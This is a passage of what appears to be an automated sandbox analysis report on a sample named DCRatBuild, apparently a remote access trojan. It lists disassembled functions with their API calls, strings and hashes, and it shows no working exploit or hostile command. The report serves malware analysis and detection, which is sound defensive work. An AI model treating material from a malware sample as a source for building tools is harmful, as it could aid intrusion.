Instruction Fuzzy Hash: 484186719002A866DF21ABA0CC55EDE73FDEF55740F8448E5B609F3152EB389BC98B60

Function 00B21218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00B2122E

Part of subcall function 00B1B146: GetVersionExW.KERNEL32(?), ref: 00B1B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00B21251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00B21263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B21274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B21284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B21294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B212CF
__aullrem.LIBCMT ref: 00B21379

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: b5f6091b838b0255d74ea876e766e2e49f31ecd12521da2f2d17308199d9d43c
Instruction ID: 4e874a160bb5fdb1bad83a6ca11ec6e5a8ef92d2dd7756bd5f6344911f0570be
Opcode Fuzzy Hash: b5f6091b838b0255d74ea876e766e2e49f31ecd12521da2f2d17308199d9d43c
Instruction Fuzzy Hash: 904145B2408305AFC710DF69D88096BBBF9FB88714F048D2EF59AD2600E734E609CB52

Function 00B12210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B12536

Part of subcall function 00B14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B140A5

Part of subcall function 00B205DA: _wcslen.LIBCMT ref: 00B205E0

Strings

;%u, xrefs: 00B12523
xc%u, xrefs: 00B1275A
x%u, xrefs: 00B126FD

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 4ab2e7d5c4adb4c58ca406fb1ea603bf75b68e072c877c0b99e46f6d9b46c997
Instruction ID: 332e263ce24b966833bbe4851fdb25b6af46f53c375a00e9de6c67e79a8e7b73
Opcode Fuzzy Hash: 4ab2e7d5c4adb4c58ca406fb1ea603bf75b68e072c877c0b99e46f6d9b46c997
Instruction Fuzzy Hash: 23F107706043809BDF15EB2884D5BFE7BD59F94300F8805E9ED8A9B283CB649DD5C7A2

Function 00B29CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B29D0A

Strings

</p>, xrefs: 00B29DE8
</style>, xrefs: 00B29E52
<style>, xrefs: 00B29E30
<br>, xrefs: 00B29DFE
>, xrefs: 00B29D4B

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: d8fcf08df5560ab79108e24f003dc19890ebbc331a58baca6afb6f09c7d47201
Instruction ID: d029e8a73af92b2c9e0edbfeb43a321adce6a82c54ad6810a6380e4892d6d1cf
Opcode Fuzzy Hash: d8fcf08df5560ab79108e24f003dc19890ebbc331a58baca6afb6f09c7d47201
Instruction Fuzzy Hash: 2D515C6670033391DB30AA29B8117B673E0DFA1790F6A09BAF9CDCB1C0FB658D459261

Function 00B3F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00B3FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00B3F6CF
__fassign.LIBCMT ref: 00B3F74A
__fassign.LIBCMT ref: 00B3F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00B3F78B
WriteFile.KERNEL32(?,00000000,00000000,00B3FE02,00000000,?,?,?,?,?,?,?,?,?,00B3FE02,00000000), ref: 00B3F7AA
WriteFile.KERNEL32(?,00000000,00000001,00B3FE02,00000000,?,?,?,?,?,?,?,?,?,00B3FE02,00000000), ref: 00B3F7E3

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1a5f5cb584c083ef09bd8cd48c73ce3d1f5026b9608ff02064cf117970dfe098
Instruction ID: 0702d9d349225a1063b18b6657a27f8e6b0ba149373116b05f2e726ad25063e8
Opcode Fuzzy Hash: 1a5f5cb584c083ef09bd8cd48c73ce3d1f5026b9608ff02064cf117970dfe098
Instruction Fuzzy Hash: 1E51A5B5D0024AEFCB14CFA4DC85AEEBBF4FF09300F2441AAE555E7251D670AA41CBA0

Function 00B32900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B32937
___except_validate_context_record.LIBVCRUNTIME ref: 00B3293F
_ValidateLocalCookies.LIBCMT ref: 00B329C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00B329F3
_ValidateLocalCookies.LIBCMT ref: 00B32A48

Strings

csm, xrefs: 00B329DD

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 709f8e965c3b9ddf90e60ca0494c73ca47a20fe4fac7f35f711ea0916624bd4d
Instruction ID: 525af178daea2b722883e4a5c162293335d756bb0f964c4214d4fb1f26ef1c87
Opcode Fuzzy Hash: 709f8e965c3b9ddf90e60ca0494c73ca47a20fe4fac7f35f711ea0916624bd4d
Instruction Fuzzy Hash: 6841A434A00218AFCF10DF68C885A9EBBF5FF45324F2481E5E815AB392DB71DA45DB91

Function 00B29ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00B29EEE
GetWindowRect.USER32(?,00000000), ref: 00B29F44
ShowWindow.USER32(?,00000005,00000000), ref: 00B29FDB
SetWindowTextW.USER32(?,00000000), ref: 00B29FE3
ShowWindow.USER32(00000000,00000005), ref: 00B29FF9

Strings

RarHtmlClassName, xrefs: 00B29FA5

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: ec9f6de3c5610c084dfe838bd17487d05964fb8de10c9521137626b93b620efd
Instruction ID: 1a8e6cb54fae5fbcf252a205142b5f9cabb6a0ef4eab9708cf1933d265bd9de9
Opcode Fuzzy Hash: ec9f6de3c5610c084dfe838bd17487d05964fb8de10c9521137626b93b620efd
Instruction Fuzzy Hash: 5841D131004320EFDB215F64EC49B6B7BE8FF48B01F004599F84DAA066CB34EA44DB66

Function 00B29955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B2995E
_wcslen.LIBCMT ref: 00B29993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00B29987
<br>, xrefs: 00B299DF
, xrefs: 00B299B0
 , xrefs: 00B29A21

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: c35074b39b821dace10358bf319fb02a2de5be4b83f6c822c0689792a20e4f78
Instruction ID: 0e124db5b2af0482e41a1173d5999e6ca804faf74397f925ee260aa9497c8063
Opcode Fuzzy Hash: c35074b39b821dace10358bf319fb02a2de5be4b83f6c822c0689792a20e4f78
Instruction Fuzzy Hash: 2331823264436566DA34AB54BC43B7B73E4EB51720F60849FF48E472C0FB60AD9183A5

Function 00B3C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B3C868: _free.LIBCMT ref: 00B3C891

_free.LIBCMT ref: 00B3C8F2

Part of subcall function 00B38DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3C896,?,00000000,?,00000000,?,00B3C8BD,?,00000007,?,?,00B3CCBA,?), ref: 00B38DE2
Part of subcall function 00B38DCC: GetLastError.KERNEL32(?,?,00B3C896,?,00000000,?,00000000,?,00B3C8BD,?,00000007,?,?,00B3CCBA,?,?), ref: 00B38DF4

_free.LIBCMT ref: 00B3C8FD
_free.LIBCMT ref: 00B3C908
_free.LIBCMT ref: 00B3C95C
_free.LIBCMT ref: 00B3C967
_free.LIBCMT ref: 00B3C972
_free.LIBCMT ref: 00B3C97D

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 5983cee26ad84c1e66cab509d2bc5d58a46f779015c769301fd3657b410aee8e
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 9B111C72580B04BAE621BBB1CC07FDB7FECAF04B00F504C69B39DB6092DA65B6158751

Function 00B2E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00B2E669,00B2E5CC,00B2E86D), ref: 00B2E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B2E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B2E630

Strings

ReleaseSRWLockExclusive, xrefs: 00B2E625
AcquireSRWLockExclusive, xrefs: 00B2E615
KERNEL32.DLL, xrefs: 00B2E600

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 6bfa06d538e9d1ed203183a4694e020e5fcde4e61efe10e1221f6814288bdca7
Instruction ID: 6f5467efebf43e8b8dcab1e29a5f3b31c76d5e3ff11c3546c53e3456da5b2731
Opcode Fuzzy Hash: 6bfa06d538e9d1ed203183a4694e020e5fcde4e61efe10e1221f6814288bdca7
Instruction Fuzzy Hash: 10F0C2317906325F0F234EBB7C9567632D8EA36B4131409F9E96DDB210EF10CE546AA0

Function 00B2146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00B214C2

Part of subcall function 00B1B146: GetVersionExW.KERNEL32(?), ref: 00B1B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B214E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B21500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B21513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B21523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B21533

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 225beec8afc8fc26c970c05be35089a886a5d52ce0add75ccb5e824baeaafe57
Instruction ID: 50521cd975ca03b8e10e95dd66918d24b8e0b04b4a6661e719a752eb2c7dbe3b
Opcode Fuzzy Hash: 225beec8afc8fc26c970c05be35089a886a5d52ce0add75ccb5e824baeaafe57
Instruction Fuzzy Hash: 10311879108355ABC700DFA8D88599BB7F8FF98714F044A1EF999D3210E730D609CBA6

Function 00B32AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B32AF1,00B302FC,00B2FA34), ref: 00B32B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B32B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B32B2F
SetLastError.KERNEL32(00000000,00B32AF1,00B302FC,00B2FA34), ref: 00B32B81

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 074bf4ee3cec84a6a0993f4810f45c328e30a7e829125e5b420b572efec4f611
Instruction ID: 571382aa9ab9e0d446ec11cb521c422c0a63695f31cd142b0275fb40c8346cf6
Opcode Fuzzy Hash: 074bf4ee3cec84a6a0993f4810f45c328e30a7e829125e5b420b572efec4f611
Instruction Fuzzy Hash: 0801D43A1093116EA6142B747C85A277BD9FF02B75F7007B9F120561E0FF219E009244

Function 00B397E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00B51030,00B34674,00B51030,?,?,00B33F73,00000050,?,00B51030,00000200), ref: 00B397E9
_free.LIBCMT ref: 00B3981C
_free.LIBCMT ref: 00B39844
SetLastError.KERNEL32(00000000,?,00B51030,00000200), ref: 00B39851
SetLastError.KERNEL32(00000000,?,00B51030,00000200), ref: 00B3985D
_abort.LIBCMT ref: 00B39863

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 7b584ebe4008bc1780104bebf5224dbc9a464a7c93d96320bd43ef584fb2edeb
Instruction ID: cc22881bceeb723148ebb401e1c16b0df7d363d7a277bc61723fd32204d00928
Opcode Fuzzy Hash: 7b584ebe4008bc1780104bebf5224dbc9a464a7c93d96320bd43ef584fb2edeb
Instruction Fuzzy Hash: 29F0A43A14461166C71233247C5AB1B3AF5EFD3BB1F3401B8F628A7292FFA0CD054565

Function 00B2DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B2DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B2DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2DC72
TranslateMessage.USER32(?), ref: 00B2DC7C
DispatchMessageW.USER32(?), ref: 00B2DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B2DC91

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: a9fc86116db20db23f937ec9473c0b9f54e35a90651bafb3cb2826fcb01b5cb0
Instruction ID: 4cd80acbc6510bd11aa7d7f7614c917c8d64037d3d6d491566ad4a755d66bca5
Opcode Fuzzy Hash: a9fc86116db20db23f937ec9473c0b9f54e35a90651bafb3cb2826fcb01b5cb0
Instruction Fuzzy Hash: BFF04471A01229BBCB206BA5EC4DEDF7FBDEF42B51B044111F50EE2050DA74C685D7A0

Function 00B1C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00B205DA: _wcslen.LIBCMT ref: 00B205E0

Part of subcall function 00B1B92D: _wcsrchr.LIBVCRUNTIME ref: 00B1B944

_wcslen.LIBCMT ref: 00B1C197
_wcslen.LIBCMT ref: 00B1C1DF

Strings

.sfx, xrefs: 00B1C11A
.rar, xrefs: 00B1C0E1, 00B1C134
.exe, xrefs: 00B1C10B

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 4ac5e777f452bcc9f45aa328d56e12077521e03d740a7efaa6087c0cdebc491a
Instruction ID: 51aeae500f7514d459ccfc58edd48c5eb934a9541e2043de808bf738b60b5f94
Opcode Fuzzy Hash: 4ac5e777f452bcc9f45aa328d56e12077521e03d740a7efaa6087c0cdebc491a
Instruction Fuzzy Hash: 5E4149215C0361A6C731AF349846EBB7BF4EF44B44FA449CEF9966B182EB604ED1C391

Function 00B2CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00B2CE9D

Part of subcall function 00B1B690: _wcslen.LIBCMT ref: 00B1B696

_swprintf.LIBCMT ref: 00B2CED1

Part of subcall function 00B14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B140A5

SetDlgItemTextW.USER32(?,00000066,00B5946A), ref: 00B2CEF1
EndDialog.USER32(?,00000001), ref: 00B2CFFE

Strings

%s%s%u, xrefs: 00B2CEC6

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 412011057eea79945786c868c5c32c8e4128026046851434919e71bb920a298a
Instruction ID: f93734d204fe9fca0da53bcadb156a34636550ed25fdcb044c501eeb21013d71
Opcode Fuzzy Hash: 412011057eea79945786c868c5c32c8e4128026046851434919e71bb920a298a
Instruction Fuzzy Hash: 0A415DB1900268AADF21DB90EC45BEE77ECEB04341F4080E6B90DE7151EE749A858F65

Function 00B1BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B1BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00B1A275,?,?,00000800,?,00B1A23A,?,00B1755C), ref: 00B1BBC5
_wcslen.LIBCMT ref: 00B1BC3B

Strings

